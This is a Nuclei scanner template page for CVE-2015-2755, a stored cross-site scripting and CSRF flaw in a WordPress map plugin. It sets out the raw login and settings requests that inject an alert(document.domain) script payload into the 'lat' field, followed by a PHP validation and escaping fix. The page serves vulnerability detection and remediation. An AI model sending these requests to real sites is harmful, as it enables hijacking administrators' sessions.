WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting
ID: CVE-2015-2755
Severity: medium
Author: r3Y3r53
Tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
Description
WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.
YAML Source
id: CVE-2015-2755

info:
  name: WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
  remediation: |
    Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/131155/
    - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html
    - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2755
    - https://wordpress.org/plugins/ab-google-map-travel/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2015-2755
    cwe-id: CWE-352
    epss-score: 0.01828
    epss-percentile: 0.88216
    cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ab_google_map_travel_project
    product: ab_google_map_travel
    framework: wordpress
  tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")'
          - 'contains(body_2, "ab-google-map-travel")'
        condition: and
# digest: 490a004630440220477cbbbc3d19ddbc73781dacaa1e51cdf62b52f8a2ae3882065f99fbbf3cf77702206d7ed03c8938db7d10ba6d991a0ea0d3c3e523f56a8bd97da9f25a9a79de4526:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-2755.yaml"
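
The five parameters named in the description are all numeric map settings, so the server-side fix is strict type and range validation before storage, plus escaping on output. The sketch below is an added example in plain PHP, not the plugin's or the vendor's code; the names `AB_MAP_RULES`, `ab_map_validate`, `ab_map_attr` and the numeric ranges are assumptions, and the sample input is built from the request body in the template above.

```php
<?php
// Added example: hypothetical validator for the five settings fields named in the
// description. Names and ranges are assumptions; this is not the plugin's code.
declare(strict_types=1);

const AB_MAP_RULES = [
    'lat'        => ['float', -90.0, 90.0],
    'long'       => ['float', -180.0, 180.0],
    'map_width'  => ['int', 1, 4096],
    'map_height' => ['int', 1, 4096],
    'zoom'       => ['int', 0, 21],
];

/** Returns [clean values, rejected field names]; a rejected value is never stored. */
function ab_map_validate(array $post): array
{
    $clean = [];
    $rejected = [];
    foreach (AB_MAP_RULES as $field => [$type, $min, $max]) {
        $raw = $post[$field] ?? null;
        if (!is_string($raw)) {          // missing field or array-valued parameter
            $rejected[] = $field;
            continue;
        }
        $filter = $type === 'float' ? FILTER_VALIDATE_FLOAT : FILTER_VALIDATE_INT;
        $value = filter_var($raw, $filter);
        if ($value === false || $value < $min || $value > $max) {
            $rejected[] = $field;        // not a number, or outside the allowed range
            continue;
        }
        $clean[$field] = $value;         // typed int/float, not the raw string
    }
    return [$clean, $rejected];
}

/** Escape at output time as well, so a value stored before the fix stays inert. */
function ab_map_attr($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample: the five fields from the template's second request body.
parse_str('lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E'
    . '&long=76.26730&map_width=500&map_height=300&zoom=7', $post);

[$clean, $rejected] = ab_map_validate($post);
echo 'rejected: ', implode(',', $rejected), PHP_EOL;
echo 'stored:   ', json_encode($clean), PHP_EOL;
echo 'escaped:  ', ab_map_attr($post['lat']), PHP_EOL;
```

Because the template classifies the issue as CWE-352, a real settings handler would also verify a WordPress nonce (for example with `check_admin_referer()`) before accepting the POST; that step needs the WordPress runtime and is not shown here.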